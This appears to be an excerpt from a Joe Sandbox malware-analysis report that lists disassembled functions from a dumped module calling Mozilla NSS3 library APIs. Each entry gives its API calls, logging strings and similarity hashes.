                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                                                                                                                                                            • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                                                                                                                                                            • API String ID: 1882561532-3437882492
                                                                                                                                                                                                                            • Opcode ID: 2047a76584fe209874eb372e6071a7015ec72c7ca62a097849108b5311706c83
                                                                                                                                                                                                                            • Instruction ID: 73892f838d6cbea2891cf4fb2cd21998a31bba6dec76dab9ecdf81ba8847a15f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2047a76584fe209874eb372e6071a7015ec72c7ca62a097849108b5311706c83
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E5170B1E001455BDF109F76EC41AAE7AB9EF95358F244029E809EBB01F731D915CBE2
                                                                                                                                                                                                                            Function 6CBA2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CBA2DEC
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CBA2E00
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CBA2E2B
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CBA2E43
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CB74F1C,?,-00000001,00000000,?), ref: 6CBA2E74
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CB74F1C,?,-00000001,00000000), ref: 6CBA2E88
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CBA2EC6
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CBA2EE4
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CBA2EF8
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA2F62
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBA2F86
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C), ref: 6CBA2F9E
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA2FCA
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBA301A
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CBA302E
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA3066
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBA3085
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA30EC
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBA310C
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C), ref: 6CBA3124
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA314C
                                                                                                                                                                                                                              • Part of subcall function 6CB89180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CBB379E,?,6CB89568,00000000,?,6CBB379E,?,00000001,?), ref: 6CB8918D
                                                                                                                                                                                                                              • Part of subcall function 6CB89180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CBB379E,?,6CB89568,00000000,?,6CBB379E,?,00000001,?), ref: 6CB891A0
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507AD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507CD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507D6
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAE204A), ref: 6CB507E4
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,6CAE204A), ref: 6CB50864
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB50880
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,6CAE204A), ref: 6CB508CB
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508D7
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508FB
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBA316D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3383223490-0
                                                                                                                                                                                                                            • Opcode ID: a562c8ccd74707e1473f08908fb5ece438ba5162e298330447c3538179294bf8
                                                                                                                                                                                                                            • Instruction ID: b8e5c0390118482217c8e63881a2b502388fe9d85edd1f86be0a792833cf4bc8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a562c8ccd74707e1473f08908fb5ece438ba5162e298330447c3538179294bf8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28F17AB1D042499FDF00DFA9D884BAEBBB4FF09318F144169EC44A7611E731E996CB92
                                                                                                                                                                                                                            Function 6CBA6CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CBA6943
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CBA6957
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CBA6972
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CBA6983
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CBA69AA
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CBA69BE
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CBA69D2
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CBA69DF
                                                                                                                                                                                                                              • Part of subcall function 6CBA6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CBA6A5B
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CBA6D8C
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBA6DC5
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6DD6
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6DE7
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CBA6E1F
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBA6E4B
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBA6E72
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6EA7
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6EC4
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6ED5
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBA6EE3
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6EF4
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6F08
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBA6F35
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6F44
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBA6F5B
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBA6F65
                                                                                                                                                                                                                              • Part of subcall function 6CBA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CBA781D,00000000,6CB9BE2C,?,6CBA6B1D,?,?,?,?,00000000,00000000,6CBA781D), ref: 6CBA6C40
                                                                                                                                                                                                                              • Part of subcall function 6CBA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CBA781D,?,6CB9BE2C,?), ref: 6CBA6C58
                                                                                                                                                                                                                              • Part of subcall function 6CBA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CBA781D), ref: 6CBA6C6F
                                                                                                                                                                                                                              • Part of subcall function 6CBA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CBA6C84
                                                                                                                                                                                                                              • Part of subcall function 6CBA6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CBA6C96
                                                                                                                                                                                                                              • Part of subcall function 6CBA6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CBA6CAA
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBA6F90
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBA6FC5
                                                                                                                                                                                                                            • PK11_GetInternalKeySlot.NSS3 ref: 6CBA6FF4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1304971872-0
                                                                                                                                                                                                                            • Opcode ID: 9350cc1d5b8dc398817e45303eded2311a0d078d9d2e7e1c7348a38fafedc9cd
                                                                                                                                                                                                                            • Instruction ID: 625f302e6ebc426742e7df95953dc56f3bb8476eb52a38f1e059f24ecb6be308
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9350cc1d5b8dc398817e45303eded2311a0d078d9d2e7e1c7348a38fafedc9cd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8CB161F1E092999FDF00CBE9D844B9EBBB8EF09349F140025E855E7640E731E956CB62
                                                                                                                                                                                                                            Function 6CBA4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBA4C4C
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CBA4C60
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4CA1
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CBA4CBE
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4CD2
                                                                                                                                                                                                                            • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4D3A
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4D4F
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4DB7
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507AD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507CD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507D6
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAE204A), ref: 6CB507E4
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,6CAE204A), ref: 6CB50864
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB50880
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,6CAE204A), ref: 6CB508CB
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508D7
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508FB
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBA4DD7
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CBA4DEC
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA4E1B
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBA4E2F
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4E5A
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBA4E71
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBA4E7A
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA4EA2
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBA4EC1
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CBA4ED6
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBA4F01
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBA4F2A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 759471828-0
                                                                                                                                                                                                                            • Opcode ID: e00ff5fc008ba38da1f7d931248b278e736d8adfd11b18ffd880b593722910df
                                                                                                                                                                                                                            • Instruction ID: 02119f4f31a7cbd645ecfbc1ffac0fc7f3c8ba6a4c548e8ee9811a53448e6298
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e00ff5fc008ba38da1f7d931248b278e736d8adfd11b18ffd880b593722910df
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BB10375A042459FDF00DFA8D884AAA77B4FF09318F045124ED5997B01EB31EA66CFE2
                                                                                                                                                                                                                            Function 6CB75DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB75DEC
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CB75E0F
                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000828), ref: 6CB75E35
                                                                                                                                                                                                                            • SECKEY_CopyPublicKey.NSS3(?), ref: 6CB75E6A
                                                                                                                                                                                                                            • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CB75EC3
                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CB75ED9
                                                                                                                                                                                                                            • SECKEY_SignatureLen.NSS3(?), ref: 6CB75F09
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CB75F49
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB75F89
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB75FA0
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB75FB6
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CB75FBF
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB7600C
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB76079
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB76084
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB76094
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2310191401-3916222277
                                                                                                                                                                                                                            • Opcode ID: 24ef259050714cf1476dae1aa756bb7c768245dffcf2b47eb59b2452a75628b0
                                                                                                                                                                                                                            • Instruction ID: 80727d7517dd1f083109ecc4a50bd3eee4034b2e15e99dc15a17160c0c648861
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24ef259050714cf1476dae1aa756bb7c768245dffcf2b47eb59b2452a75628b0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C81C6B1E002859BDF208A64DC85BAE77B5EF44318F144128EC29AB791E731E958C7F6
                                                                                                                                                                                                                            Function 6CB96D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_Digest), ref: 6CB96D86
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB96DB4
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB96DC3
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB96DD9
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CB96DFA
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CB96E13
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CB96E2C
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CB96E47
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CB96EB9
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                            • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
                                                                                                                                                                                                                            • API String ID: 1003633598-2270781106
                                                                                                                                                                                                                            • Opcode ID: e00668365c2147005ddfd03af5492cdd332732e6beeb4ffc8333e1163a355904
                                                                                                                                                                                                                            • Instruction ID: e44e2231de78f5e37b85c2da7ee213b040bd42ab18b9289eafecbedf284d4a4e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e00668365c2147005ddfd03af5492cdd332732e6beeb4ffc8333e1163a355904
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5441CE75601194AFDB509F54DC59E8A3BB1EB8371DF494024E808E7A22EB31DA48CBE2
                                                                                                                                                                                                                            Function 6CB99C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_LoginUser), ref: 6CB99C66
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB99C94
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB99CA3
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB99CB9
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6CB99CDA
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CB99CF5
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CB99D10
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6CB99D29
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6CB99D42
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
